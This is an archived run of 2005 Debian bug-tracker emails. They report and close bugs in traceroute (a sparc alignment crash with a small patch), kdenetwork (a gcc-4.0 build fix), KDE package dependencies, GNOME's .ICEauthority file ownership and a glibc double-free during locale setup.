id 1DxerE-0006By-00; Tue, 26 Jul 2005 22:53:32 -0700
Received: from bod by londo.c47.org with local (Exim 3.36 #1 (Debian))
id 1DxerC-000104-00
for [EMAIL PROTECTED]; Wed, 27 Jul 2005 15:53:30 +1000
Date: Wed, 27 Jul 2005 15:53:30 +1000
From: Brendan O'Dea [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: [PATCH] traceroute bus error on sparc
Message-ID: [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.9i
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: traceroute
Version: 1.4a12-19

  $ traceroute www.debian.org
  traceroute to www.debian.org (194.109.137.218), 30 hops max, 38 byte packets
  Bus error 

The fault occurs in send_probe, at:

memcpy(outdata-tv, tp, sizeof(outdata-tv));

seems to be an alignment problem; removing __attribute__((packed)) from
the tv element of outdata fixes the problem.

--bod

diff -Naur traceroute-1.4a12.debian/traceroute.c traceroute-1.4a12/traceroute.c
--- traceroute-1.4a12.debian/traceroute.c   2005-07-27 15:49:41.0 
+1000
+++ traceroute-1.4a12/traceroute.c  2005-07-27 15:50:28.0 +1000
@@ -271,7 +271,7 @@
 struct outdata {
u_char seq; /* sequence number of this packet */
u_char ttl; /* ttl packet left with */
-   struct timeval tv __attribute__((packed)); /* time packet left */
+   struct timeval tv;  /* time packet left */
 };
 
 #ifndef HAVE_ICMP_NEXTMTU

---
Received: (at 320120-close) by bugs.debian.org; 30 Aug 2005 16:48:52 +
From [EMAIL PROTECTED] Tue Aug 30 09:48:52 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EA9GL-0004Nm-00; Tue, 30 Aug 2005 09:47:05 -0700
From: Graham Wilson [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#320120: fixed in traceroute 1.4a12-20
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 09:47:05 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Source: traceroute
Source-Version: 1.4a12-20

We believe that the bug you reported is fixed in the latest version of
traceroute, which is due to be installed in the Debian FTP archive:

traceroute_1.4a12-20.diff.gz
  to pool/main/t/traceroute/traceroute_1.4a12-20.diff.gz
traceroute_1.4a12-20.dsc
  to pool/main/t/traceroute/traceroute_1.4a12-20.dsc
traceroute_1.4a12-20_powerpc.deb
  to pool/main/t/traceroute/traceroute_1.4a12-20_powerpc.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Graham Wilson [EMAIL PROTECTED] (supplier of updated traceroute package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Tue, 30 Aug 2005 15:19:55 +
Source: traceroute
Binary: traceroute
Architecture: source powerpc
Version: 1.4a12-20
Distribution: unstable
Urgency: medium
Maintainer: Graham Wilson [EMAIL PROTECTED]
Changed-By: Graham Wilson [EMAIL PROTECTED]
Description: 
 traceroute - traces the route 

Bug#325701: gnome-session: unable to launch gnome due to bad group/owner on .ICEauthority

2005-08-30 Thread Olivier Schwander
Gustavo Noronha Silva a écrit :
 Em Ter, 2005-08-30 às 14:45 +0200, Olivier Schwander escreveu:
 
Josselin Mouette a écrit :

It could be some GNOME program run as root with HOME=/home/olivier.

The problem appeared after an upgrade of gnome-session and a logout. But
  only one user is concerned: an .ICEauthority used by an other user
only with kde has a good owner.
I may have used Synaptic as root but I don't understand how it could
have bad $HOME. I tried with su and gksu but owner is preserved.
I know that I have not forced HOME=/home/olivier.
 
 
 Might be... I created a new user here tro try gksu +
 $some_GNOME_programs here. I tried nautilus, evolution; I even invoked a
 full gnome-session as root using gksu to try it out and make sure.
 No .ICEauthority was created at all.
 
 gksu does leave some variables like USERNAME and LOGNAME untouched,
 though, so a misbehaving program could be the problem there. I tried
 synaptic, though, and it works without creating a .ICEauthority.
 
 Haven't you tried to run something else as root, using other means,
 maybe?
 
 See ya,
 
I tried to launch various gnome programs as root or not but there is no
.ICEauthority file created.
The only way to obtain a .ICEauthority file is at the first launch of a
gnome session. The file has the good owner.
If I delete the file, it is never recreated.
I can't manage to find what program created this file.






Bug#318180: marked as done (kde: Dependance problems since introducing of xserver-xorg (3.4.1 - SID))

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 10:17:08 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#318180: fixed in kdenetwork 4:3.4.2-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 13 Jul 2005 22:00:34 +
From [EMAIL PROTECTED] Wed Jul 13 15:00:34 2005
Return-path: [EMAIL PROTECTED]
Received: from smtp3.wanadoo.fr [193.252.22.28] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DspHO-0001lv-00; Wed, 13 Jul 2005 15:00:34 -0700
Received: from me-wanadoo.net (localhost [127.0.0.1])
by mwinf0304.wanadoo.fr (SMTP Server) with ESMTP id 3CCB21C00CCA
for [EMAIL PROTECTED]; Thu, 14 Jul 2005 00:00:03 +0200 (CEST)
Received: from localhost.localdomain 
(ALille-251-1-77-164.w82-127.abo.wanadoo.fr [82.127.252.164])
by mwinf0304.wanadoo.fr (SMTP Server) with ESMTP id B2DB81C00CC5;
Thu, 14 Jul 2005 00:00:02 +0200 (CEST)
X-ME-UUID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: KnuX [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: kde: Dependance problems since introducing of xserver-xorg (3.4.1 - 
SID)
X-Mailer: reportbug 3.15
Date: Thu, 14 Jul 2005 00:00:09 +0200
Message-Id: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Package: kde
Severity: serious
Justification: 4


Since xserver-xorg is in Debian unstable, some dependance issues appear.
I hope this log above log will be explicit, I don't know how to explain the 
problem in an other way ;)

# apt-get dist-upgrade
Reading package lists... Done
Building dependency tree... Done
Calculating upgrade... Done
The following packages have been kept back:
  x-window-system-core xbase-clients xutils
0 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.
[EMAIL PROTECTED]:~# apt-get install xbase-clients
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
  libglu1-xorg x-window-system-core xserver-xorg
Recommended packages:
  discover1 mdetect xresprobe laptop-detect
The following packages will be REMOVED:
  freeglut3 freeglut3-dev k3b kaffeine kcontrol kdebase konq-plugins konqueror 
libglut3 libglut3-dev libopenexr-dev
  libqt-perl libqt3-mt-dev libsmokeqt1 libwxgtk2.4 libwxgtk2.4-1 
libwxgtk2.4-dev libxine1 xlibmesa-dev xlibmesa-glu
  xlibmesa-glu-dev xlibmesa3 xserver-xfree86
The following NEW packages will be installed:
  libglu1-xorg xserver-xorg
The following packages will be upgraded:
  x-window-system-core xbase-clients
2 upgraded, 2 newly installed, 23 to remove and 1 not upgraded.
Need to get 7946kB of archives.
After unpacking 68.2MB disk space will be freed.
Do you want to continue [Y/n]? n
Abort.
[EMAIL PROTECTED]:~# apt-get install kde
Reading package lists... Done
Building dependency tree... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.

Since you only requested a single operation it is extremely likely that
the package is simply not installable and a bug report against
that package should be filed.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
  kde: Depends: kdenetwork but it is not going to be installed
E: Broken packages
[EMAIL PROTECTED]:~# apt-get install kdenetwork
Reading package lists... Done
Building dependency tree... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.

Since you only requested a single operation it is extremely likely that
the package is simply not installable and a bug report against
that package should be filed.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
  kdenetwork: Depends: kwifimanager (= 4:3.4.1-1) but it is not going to be 
installed
E: Broken packages
[EMAIL PROTECTED]:~# apt-get install kwifimanager

Bug#300536: marked as done (kdenetwork: FTBFS (amd64/gcc-4.0): 'class Kopete::Global::PropertiesPrivate' has no member named 'mTemplates')

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 10:17:08 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#300536: fixed in kdenetwork 4:3.4.2-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 20 Mar 2005 12:28:26 +
From [EMAIL PROTECTED] Sun Mar 20 04:28:26 2005
Return-path: [EMAIL PROTECTED]
Received: from c223012.adsl.hansenet.de (localhost.localdomain) [213.39.223.12] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DCzXc-0002VF-00; Sun, 20 Mar 2005 04:28:24 -0800
Received: from aj by localhost.localdomain with local (Exim 4.44)
id 1DCzXW-Fo-FG; Sun, 20 Mar 2005 13:28:18 +0100
To: Debian Bug Tracking System [EMAIL PROTECTED]
From: Andreas Jochens [EMAIL PROTECTED]
Subject: kdenetwork: FTBFS (amd64/gcc-4.0): 'class 
Kopete::Global::PropertiesPrivate' has no member named 'mTemplates'
Message-Id: [EMAIL PROTECTED]
Date: Sun, 20 Mar 2005 13:28:18 +0100
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Package: kdenetwork
Severity: normal
Tags: patch

When building 'kdenetwork' on amd64 with gcc-4.0,
I get the following error:

../../../kopete/libkopete/kopeteglobal.cpp:192: error: 'class 
Kopete::Global::PropertiesPrivate' has no member named 'mTemplates'
../../../kopete/libkopete/kopeteglobal.cpp:197: error: invalid use of undefined 
type 'struct Kopete::Global::ContactPropertyTmpl'
../../../kopete/libkopete/kopeteglobal.h:56: error: forward declaration of 
'struct Kopete::Global::ContactPropertyTmpl'
../../../kopete/libkopete/kopeteglobal.cpp: At global scope:
../../../kopete/libkopete/kopeteglobal.cpp:202: error: expected initializer 
before '' token
../../../kopete/libkopete/kopeteglobal.cpp: In member function 'const 
Kopete::Global::ContactPropertyTmpl Kopete::Global::Properties::tmpl(const 
QString) const':
../../../kopete/libkopete/kopeteglobal.cpp:78: warning: control reaches end of 
non-void function
../../../kopete/libkopete/kopeteglobal.cpp: In member function 'bool 
Kopete::Global::Properties::registerTemplate(const QString, const 
Kopete::Global::ContactPropertyTmpl)':
../../../kopete/libkopete/kopeteglobal.cpp:94: warning: control reaches end of 
non-void function
make[5]: *** [libkopete_la.all_cpp.lo] Error 1
make[5]: Leaving directory `/kdenetwork-3.3.2/obj-x86_64-linux/kopete/libkopete'

With the attached patch 'kdenetwork' can be compiled
on amd64 using gcc-4.0.

The patch was taken from CVS.

Regards
Andreas Jochens

diff -urN ../tmp-orig/kdenetwork-3.3.2/kopete/libkopete/kopeteglobal.h 
./kopete/libkopete/kopeteglobal.h
--- ../tmp-orig/kdenetwork-3.3.2/kopete/libkopete/kopeteglobal.h
2004-06-25 11:10:09.0 +0200
+++ ./kopete/libkopete/kopeteglobal.h   2005-03-20 12:15:27.177346543 +0100
@@ -53,7 +53,7 @@
 **/
class Properties
{
-   friend class ContactPropertyTmpl;
+   friend class Kopete::ContactPropertyTmpl;
public:
/**
 * \brief Singleton accessor for this class.
diff -urN ../tmp-orig/kdenetwork-3.3.2/kopete/libkopete/kopetepassword.h 
./kopete/libkopete/kopetepassword.h
--- ../tmp-orig/kdenetwork-3.3.2/kopete/libkopete/kopetepassword.h  
2004-05-05 17:09:31.0 +0200
+++ ./kopete/libkopete/kopetepassword.h 2005-03-20 12:17:58.337079127 +0100
@@ -168,8 +168,8 @@
Private *d;
 
//TODO: can we rearrange things so these aren't friends?
-   friend class KopetePasswordGetRequest;
-   friend class KopetePasswordSetRequest;
+   friend class ::KopetePasswordGetRequest;
+   friend class ::KopetePasswordSetRequest;
 };
 
 }

---
Received: (at 300536-close) by bugs.debian.org; 30 Aug 2005 17:19:14 +
From [EMAIL PROTECTED] Tue Aug 30 10:19:14 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EA9jQ-0006hF-00; Tue, 30 Aug 2005 10:17:08 -0700
From: Debian Qt/KDE Maintainers debian-qt-kde@lists.debian.org
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#300536: fixed in kdenetwork 4:3.4.2-1
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 

Bug#322746: marked as done (glibc detected *** double free or corruption)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 11:02:12 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#323849: fixed in libterm-readline-gnu-perl 1.15-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 12 Aug 2005 15:24:16 +
From [EMAIL PROTECTED] Fri Aug 12 08:24:16 2005
Return-path: [EMAIL PROTECTED]
Received: from armagnac.ifi.unizh.ch (albatross.madduck.net) [130.60.75.72] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1E3bOK-0007gO-00; Fri, 12 Aug 2005 08:24:16 -0700
Received: from localhost (albatross.madduck.net [127.0.0.1])
by albatross.madduck.net (postfix) with ESMTP id 3AA478E2FFD
for [EMAIL PROTECTED]; Fri, 12 Aug 2005 17:24:12 +0200 (CEST)
Received: from albatross.madduck.net ([127.0.0.1])
by localhost (albatross.madduck.net [127.0.0.1]) (amavisd-new, port 
10024)
with LMTP id 20699-02-7 for [EMAIL PROTECTED];
Fri, 12 Aug 2005 17:24:12 +0200 (CEST)
Received: from cirrus.madduck.net (84-72-21-69.dclient.hispeed.ch [84.72.21.69])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(Client CN cirrus.madduck.net, Issuer madduck.net CA (verified OK))
by albatross.madduck.net (postfix) with ESMTP id 0CE948DCCB2
for [EMAIL PROTECTED]; Fri, 12 Aug 2005 17:24:11 +0200 (CEST)
Received: by cirrus.madduck.net (Postfix, from userid 1000)
id 1189920041F; Fri, 12 Aug 2005 17:24:10 +0200 (CEST)
Date: Fri, 12 Aug 2005 17:24:10 +0200
From: martin f krafft [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: glibc detected *** double free or corruption
Message-ID: [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol=application/pgp-signature; boundary=/04w6evG8XlLl3ft
Content-Disposition: inline
X-Reportbug-Version: 3.15
Organization: Debian GNU/Linux
X-OS: Debian GNU/Linux 3.1 kernel 2.6.12-cirrus i686
X-Motto: Keep the good times rollin'
X-Subliminal-Message: debian/rules!
X-Debbugs-No-Ack: please spare me
User-Agent: Mutt/1.5.9i
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at madduck.net
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-11.0 required=4.0 tests=BAYES_00,HAS_PACKAGE,
X_DEBBUGS_NO_ACK autolearn=ham version=2.60-bugs.debian.org_2005_01_02


--/04w6evG8XlLl3ft
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Package: libc6
Version: 2.3.5-3
Severity: serious

# dpkg --configure -a
Setting up locales (2.3.5-3) ...
Generating locales (this might take a while)...
[...]
Generation complete.
*** glibc detected *** double free or corruption (!prev): 0x0873f7f0 ***
dpkg: error processing locales (--configure):
 subprocess post-installation script killed by signal (Aborted)

-- System Information:
Debian Release: 3.1
  APT prefers stable
  APT policy: (700, 'stable'), (600, 'testing'), (98, 'unstable'), (1, 'exp=
erimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-cirrus
Locale: LANG=3Den_GB, LC_CTYPE=3Den_GB.UTF-8 (charmap=3DUTF-8)

-- no debconf information

--=20
 .''`. martin f. krafft [EMAIL PROTECTED]
: :'  :proud Debian developer and author: http://debiansystem.info
`. `'`
  `-  Debian - when you have better things to do than fixing a system
=20
Invalid/expired PGP (sub)keys? Use subkeys.pgp.net as keyserver!
=20
micro$oft encrypts your windows nt password when stored on a windows
ce device. but if you look carefully at their encryption algorithm,
they simply xor the password with susageP, Pegasus spelled
backwards. Pegasus is the code name of windows ce. this is so pathetic
it's staggering.

--/04w6evG8XlLl3ft
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: Digital signature (GPG/PGP)
Content-Disposition: inline

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFC/L8aIgvIgzMMSnURAiiqAKCUHEJMLLpdkK09gX7zpdT401sToQCg3UO9
x7oQHJWqJuc7AGGEvTZW3As=
=JTci
-END PGP SIGNATURE-

--/04w6evG8XlLl3ft--

---
Received: (at 323849-close) by bugs.debian.org; 30 Aug 2005 18:10:51 +
From [EMAIL PROTECTED] Tue Aug 30 11:10:50 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 

Bug#322746: marked as done (glibc detected *** double free or corruption)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 11:02:12 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#304604: fixed in libterm-readline-gnu-perl 1.15-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 12 Aug 2005 15:24:16 +
From [EMAIL PROTECTED] Fri Aug 12 08:24:16 2005
Return-path: [EMAIL PROTECTED]
Received: from armagnac.ifi.unizh.ch (albatross.madduck.net) [130.60.75.72] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1E3bOK-0007gO-00; Fri, 12 Aug 2005 08:24:16 -0700
Received: from localhost (albatross.madduck.net [127.0.0.1])
by albatross.madduck.net (postfix) with ESMTP id 3AA478E2FFD
for [EMAIL PROTECTED]; Fri, 12 Aug 2005 17:24:12 +0200 (CEST)
Received: from albatross.madduck.net ([127.0.0.1])
by localhost (albatross.madduck.net [127.0.0.1]) (amavisd-new, port 
10024)
with LMTP id 20699-02-7 for [EMAIL PROTECTED];
Fri, 12 Aug 2005 17:24:12 +0200 (CEST)
Received: from cirrus.madduck.net (84-72-21-69.dclient.hispeed.ch [84.72.21.69])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(Client CN cirrus.madduck.net, Issuer madduck.net CA (verified OK))
by albatross.madduck.net (postfix) with ESMTP id 0CE948DCCB2
for [EMAIL PROTECTED]; Fri, 12 Aug 2005 17:24:11 +0200 (CEST)
Received: by cirrus.madduck.net (Postfix, from userid 1000)
id 1189920041F; Fri, 12 Aug 2005 17:24:10 +0200 (CEST)
Date: Fri, 12 Aug 2005 17:24:10 +0200
From: martin f krafft [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: glibc detected *** double free or corruption
Message-ID: [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol=application/pgp-signature; boundary=/04w6evG8XlLl3ft
Content-Disposition: inline
X-Reportbug-Version: 3.15
Organization: Debian GNU/Linux
X-OS: Debian GNU/Linux 3.1 kernel 2.6.12-cirrus i686
X-Motto: Keep the good times rollin'
X-Subliminal-Message: debian/rules!
X-Debbugs-No-Ack: please spare me
User-Agent: Mutt/1.5.9i
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at madduck.net
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-11.0 required=4.0 tests=BAYES_00,HAS_PACKAGE,
X_DEBBUGS_NO_ACK autolearn=ham version=2.60-bugs.debian.org_2005_01_02


--/04w6evG8XlLl3ft
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Package: libc6
Version: 2.3.5-3
Severity: serious

# dpkg --configure -a
Setting up locales (2.3.5-3) ...
Generating locales (this might take a while)...
[...]
Generation complete.
*** glibc detected *** double free or corruption (!prev): 0x0873f7f0 ***
dpkg: error processing locales (--configure):
 subprocess post-installation script killed by signal (Aborted)

-- System Information:
Debian Release: 3.1
  APT prefers stable
  APT policy: (700, 'stable'), (600, 'testing'), (98, 'unstable'), (1, 'exp=
erimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-cirrus
Locale: LANG=3Den_GB, LC_CTYPE=3Den_GB.UTF-8 (charmap=3DUTF-8)

-- no debconf information

--=20
 .''`. martin f. krafft [EMAIL PROTECTED]
: :'  :proud Debian developer and author: http://debiansystem.info
`. `'`
  `-  Debian - when you have better things to do than fixing a system
=20
Invalid/expired PGP (sub)keys? Use subkeys.pgp.net as keyserver!
=20
micro$oft encrypts your windows nt password when stored on a windows
ce device. but if you look carefully at their encryption algorithm,
they simply xor the password with susageP, Pegasus spelled
backwards. Pegasus is the code name of windows ce. this is so pathetic
it's staggering.

--/04w6evG8XlLl3ft
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: Digital signature (GPG/PGP)
Content-Disposition: inline

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFC/L8aIgvIgzMMSnURAiiqAKCUHEJMLLpdkK09gX7zpdT401sToQCg3UO9
x7oQHJWqJuc7AGGEvTZW3As=
=JTci
-END PGP SIGNATURE-

--/04w6evG8XlLl3ft--

---
Received: (at 304604-close) by bugs.debian.org; 30 Aug 2005 18:10:54 +
From [EMAIL PROTECTED] Tue Aug 30 11:10:54 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 

Bug#323849: marked as done (locales: error on install: double free or corruption)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 11:02:12 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#304604: fixed in libterm-readline-gnu-perl 1.15-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 18 Aug 2005 20:31:29 +
From [EMAIL PROTECTED] Thu Aug 18 13:31:29 2005
Return-path: [EMAIL PROTECTED]
Received: from iron.libaux.ucsf.edu [128.218.15.248] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1E5r2v-0001ya-00; Thu, 18 Aug 2005 13:31:29 -0700
Received: from ross by iron.libaux.ucsf.edu with local (Exim 4.52)
id 1E5r2R-0006jL-EY; Thu, 18 Aug 2005 13:30:59 -0700
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Ross Boylan [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: locales: error on install: double free or corruption
X-Mailer: reportbug 3.15
Date: Thu, 18 Aug 2005 13:30:59 -0700
Message-Id: [EMAIL PROTECTED]
X-SA-Exim-Connect-IP: locally generated
X-SA-Exim-Mail-From: [EMAIL PROTECTED]
X-SA-Exim-Scanned: No (on iron.libaux.ucsf.edu); SAEximRunCond expanded to false
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: locales
Version: 2.3.5-3
Severity: normal

My system is mostly testing, but I upgraded parts to unstable,
including glibc.  During that same upgrade, I got the error:
-
Setting up locales (2.3.5-3) ...
Generating locales (this might take a while)...
  en_US.ISO-8859-1... done
  en_US.UTF-8... done
  eu_ES.ISO-8859-1... done
  [EMAIL PROTECTED] done
  fr_FR.ISO-8859-1... done
  fr_FR.UTF-8... done
  [EMAIL PROTECTED] done
Generation complete.
*** glibc detected *** double free or corruption (!prev): 0x089a79c8 ***
dpkg: error processing locales (--configure):
 subprocess post-installation script killed by signal (Aborted)
--
This followed

--
# apt-get -qt unstable install libgal2.4-common
Reading Package Lists...
Building Dependency Tree...
The following extra packages will be installed:
  dbus-1 dbus-glib-1 libc6 libc6-dbg libc6-dev libc6-prof libgal2.4-0 
libgnomevfs2-0
  libgnomevfs2-common libhal-storage0 libhal0 locales
Recommended packages:
  gamin fam
The following NEW packages will be installed:
  dbus-1 dbus-glib-1 libhal-storage0 libhal0
The following packages will be upgraded:
  libc6 libc6-dbg libc6-dev libc6-prof libgal2.4-0 libgal2.4-common 
libgnomevfs2-0 libgnomevfs2-common
  locales
9 upgraded, 4 newly installed, 0 to remove and 349 not upgraded.
---

I don't know how serious this is, or even if the problem really lies
with locales.

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (600, 'testing'), (500, 'stable'), (50, 'unstable'), (40, 
'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.4.27adnvcd
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages locales depends on:
ii  debconf   1.4.52 Debian configuration management sy
ii  libc6 [glibc-2.3.5-3] 2.3.5-3GNU C Library: Shared libraries an

locales recommends no packages.

-- debconf information:
* locales/default_environment_locale: None
* locales/locales_to_be_generated: en_US ISO-8859-1, en_US.UTF-8 UTF-8, eu_ES 
ISO-8859-1, [EMAIL PROTECTED] ISO-8859-15, fr_FR ISO-8859-1, fr_FR.UTF-8 UTF-8, 
[EMAIL PROTECTED] ISO-8859-15

---
Received: (at 304604-close) by bugs.debian.org; 30 Aug 2005 18:10:54 +
From [EMAIL PROTECTED] Tue Aug 30 11:10:54 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EAAR2-0008BM-00; Tue, 30 Aug 2005 11:02:12 -0700
From: Gunnar Wolf [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#304604: fixed in libterm-readline-gnu-perl 1.15-2
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 11:02:12 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 

Bug#323849: marked as done (locales: error on install: double free or corruption)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 11:02:12 -0700
with message-id [EMAIL PROTECTED]
